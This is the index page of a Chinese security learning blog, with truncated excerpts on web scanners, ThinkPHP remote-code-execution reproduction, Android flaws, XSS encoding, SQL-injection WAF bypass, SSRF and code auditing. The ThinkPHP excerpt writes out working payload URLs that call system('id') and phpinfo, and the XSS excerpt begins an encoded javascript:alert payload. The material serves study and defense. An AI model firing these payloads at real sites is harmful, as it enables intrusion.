0x24bin's Blog

注：本文为“小米安全中心”原创，转载请联系“小米安全中心” 上期回顾：HTTPS原理科普 Web扫描平台的发展 1.原始社会 在Web安全兴起的初期，国内的工具相应缺乏，笔者曾经获取一个注入点数据库的MD5需要手工注入半天时间。 于是相应的安全扫描自动化工具应运而生，其中杰出代表莫过于啊D，穿山甲，和JSKY。感谢前辈给我们创造的自动化工具。这几款工具，可以列入中国网络安全的发展历史。 2.拿来主义 国内乙...

0x00 没有开头 0x01 文章参考 0x00 没有开头 环境部署安排一下  bt一键部署：配合泛解析域名，轻松部署环境 漏洞复现 qq.com为vuln host http://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id //5.1 http://qq.com/?s=index/\think\Request/input&filter=phpinfo&data=1 http://qq.com/?s=index/\think\template...

Android漏洞checklist 程序可被任意调试 风险描述：安卓AndroidManifest.xml文件中android:debuggable为true。 危害描述：app可以被任意调试。 修复建议：AndroidManifest.xml 配置文件中中设置为android:Debugable=”false”。 参考链接：https://developer.android.com/guide/topics/manifest/application-element.html#debug 程序数据任意备份 风险描述：安卓AndroidManifest.xml文件中android: all...

前几天看了浏览器解码看XSS，没有看得很明白，又找了这篇深入理解浏览器解析机制和XSS向量编码，翻译的文章，有些地方翻译的怪怪的，需要看下原文，啃了2天终于搞明白了 原文里给出了几个XSS Payload，也给出了答案和演示地址，有答案但没解析，下面一个个分析 有点像上学的时候，看书看不懂，做题不会做，看答案解析做题就懂了 Basics 1 <a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%...

最近在学习代码审计，于是发现了这篇文章，然后转过来学习学习， 并稍加了修改 也不知道这位大哥转的谁的文章，也没有附上原文链接， 转发地址：https://blog.csdn.net/ncafei/article/details/62044552 简介： 本文将要揭示能用于现实CMSs和WAFs程序中的高级绕过技术和混淆技术， 文中所提到的SQL注入语句仅仅是一些绕过保护的方法， 另外本文所有内容仅可用于安全研究，如有其它不正当的行为，后果自负...

前言 昨天忘了在公众号还是微博上看到的了，看到一个SSRF绕过的技巧，使用的是ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ绕过的，自己也没遇到过。然后想想自己对SSRF绕过还是停留在之前的了解，也没学习过新的绕过方法，所以特意找了找资料，学习学习最新黑科技，充充能。 0x00 SSRF是什么 能精简的就不扯淡，一句话就是：利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。 0x01 SSRF能干什么 探测内网信息 攻击内网或本...

最近在学习Android 移动安全逆向方面，逆向首先要看懂代码，Android4.4之前一直使用的是 Dalivk虚拟机，而Smali是用于Dalivk的反汇编程序的实现。 Smali 支持注解，调试信息，行数信息等基本Java的基本特性，可以说是很接近Java编译再JVM上的中间语言，一般用来做Android程序的逆向工程。 1.Smali文件结构 一个Smali文件对应的是一个Java的类，更准确的说是一个.class文件，如果有内部类，需要写成ClassNa...

菜鸟入坑代码审计，熊海CMS审计学习，开始吧！ 漏洞环境&搭建 访问install目录，填写相关配置。 漏洞分析 1. 入口处存在文件包含漏洞 漏洞触发文件为index.php,具体代码如下: <span role="presentation">&lt;?php</span> <span role="presentation">//单一入口模式</span> <span role="presentation">error_reporting(0); /...